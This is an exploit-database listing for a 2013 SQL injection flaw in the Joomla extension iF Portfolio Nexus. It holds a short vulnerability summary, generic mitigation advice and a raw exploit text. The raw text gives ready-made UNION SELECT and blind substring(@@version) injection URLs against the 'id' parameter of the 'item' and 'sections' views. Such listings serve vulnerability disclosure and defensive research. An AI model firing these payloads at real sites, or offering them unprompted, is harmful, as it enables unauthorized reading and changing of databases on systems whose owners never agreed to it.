header-logo
Suggest Exploit
vendor:
Joomla Extension
by:
599eme Man
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Joomla Extension
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2013

Joomla Ext. iF Portfolio Nexus SQL injection

The vulnerability exists due to insufficient filtration of user-supplied data passed to the 'id' parameter in 'item' and 'sections' scripts. A remote attacker can execute arbitrary SQL commands in application's database, cause denial of service, access or modify sensitive data, exploit various vulnerabilities in the underlying SQL server software, etc.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should sanitize all user-supplied data before using it in SQL queries. It is also recommended to use parameterized queries instead of dynamic SQL queries.
Source

Exploit-DB raw data:

_00000__00000__00000__00000__0___0__00000____0___0___000___0___0_
_0______0___0__0___0__0______00_00__0________00_00__0___0__00_00_
_0000___00000__00000__00000__0_0_0__00000____0_0_0__0___0__0_0_0_
_____0______0______0__0______0___0__0________0___0__00000__0___0_
_0000___00000__00000__00000__0___0__00000____0___0__0___0__0___0_
_________________________________________________________________


# [+] Joomla Ext. iF Portfolio Nexus SQL injection
#
# [+] Author : 599eme Man
# [+] Contact : Flouf@live.fr
#
#[------------------------------------------------------------------------------------]
#
# [+] SQL
#
# http://server/portfolio?view=item&id=-100%20union%20all%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
# http://server/portfolio?controller=sections&view=item&id=-71%20union%20all%20select%201,2,version%28%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
#
# [+] Blind
#
# http://server/portfolio?controller=sections&view=item&id=71%20and%20substring%28@@version,1,1%29=5
# http://server/portfolio?view=item&id=100 and substring(@@version,1,1)=5
#
#[--------------------------------